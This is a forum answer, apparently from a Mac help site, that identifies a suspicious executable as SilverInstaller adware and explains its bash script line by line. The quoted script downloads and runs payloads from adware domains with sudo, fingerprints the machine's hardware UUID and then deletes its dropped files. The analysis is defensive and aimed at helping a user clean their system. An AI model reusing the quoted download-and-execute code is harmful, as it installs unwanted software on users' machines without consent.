What is this unknown executable on my boot volume? Is it Malicious?
This is SilverInstaller, adware to download more adware and ‘potentially unwanted programs’. This was likely distributed through fake Flash popups, which someone on the system clicked on, downloaded, opened, installed and provided administrator credentials to.
Installed software in this package likely includes
MacKeeper, VSearch, A Pirrit injector, BrowserEnhancer, MPlayer
all of which you most certainly don't want.
- https://www.intego.com/mac-security-blog/silverinstaller-uses-new-techniques-to-install-puapup/
- https://www.intego.com/mac-security-blog/silverinstaller-sneakier-than-previously-thought/
I'll break down the code
#!/bin/bash
This code is script to be interpreted by bash, noted by this shebang.
func_4(){
Begin a function declaration including body to be called later on.
/bin/mkdir -p /var/tmp
Make sure the tmp directory exists to be used for temporary storage of the malicious payloads later on.
/usr/bin/curl -s -L -o /var/tmp/sr.tgz "http://c.premiummac.com/static/sr/sr_v2.tgz" /usr/bin/tar -xzf /var/tmp/sr.tgz -C /var/tmp cd /var/tmp/dvs
Download and extract the first malicious payload. sr_v2.tgz
is BrowserEnhancer. The payload contains a dvs directory.
mid=$(ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformUUID/ { split($0, line, "\""); printf("%s\n", line[4]); }')
Get a unique identifier for this machine to be used later.
COUNTRY="CA" if [ "$COUNTRY" == "AU" ] || [ "$COUNTRY" == "CA" ] || [ "$COUNTRY" == "US" ] || [ "$COUNTRY" == "NZ" ]\ || [ "$COUNTRY" == "ES" ] || [ "$COUNTRY" == "IT" ] || [ "$COUNTRY" == "NL" ] || [ "$COUNTRY" == "FR" ] || [ "$COUNTRY" == "IN" ]\ || [ "$COUNTRY" == "DE" ]; then
Try some region matching to decide what to do next. I say ‘try’ because this doesn't work when the region is hard-coded in the script.
sudo ./setup.sh "http://www.searchitdown.com/?n=026&searchsource=55&UM=8&gd=SY1000653" "http://www.searchitdown.com/?n=026&searchsource=69&UM=8&gd=SY1000653" "http://www.searchitdown.com/Results.aspx?n=026&searchsource=58&UM=8&gd=SY1000653" "searchitdown" "upd" "http://i.firstinstallmac.club/c/cc?id="
Call to an external script with some more fancy adware domains.
else sudo ./setup.sh "http://feed.snowbitt.com/?publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=hp&type=YHS_TGE_2712c1&_=tt1" "http://feed.snowbitt.com/?publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=nt&type=YHS_TGE_2712c1&_=tt1" "http://feed.snowbitt.com/?publisher=TingSyn&ts=sy&barcodeid=51222999&searchtype=ds&type=TGE_2712c1" "snowbitt" "upd" "http://i.firstinstallmac.club/c/cc?id=" fi
This bit never gets executed as mentioned.
CLIENT_COMP="" if [[ ! -z "$CLIENT_COMP" ]]; then /usr/bin/curl -s -L -o /var/tmp/re.txt "http://i.firstinstallmac.club/is/if?i=" fi
Grab another payload.
func_taaVqst(){ sleep 220 rm -rf /var/tmp/dvs rm -rf /var/tmp/sr.tgz } func_taaVqst &
Clean up, removing the files created and dropped earlier in the script, after a delay given that the files would have been used by then.
} func_4 &
Function all ready to go, time to call it.
That script does everything I would expect malware to do and has been around for a while so the domains it connects could be blocked or shut down now.
- Downloads some files, runs those files and cleans up after itself.
It could be ad(vertising)ware instead of malware, but it’s clearly fingerprinting your mac, reporting a unique identifier for your Mac and intending to change the state of the Mac. Unless you opted in to the tool and wanted it to run, (and even if you did once) downloading and running the MalwareBytes cleaner would be my next step
- https://www.malwarebytes.com/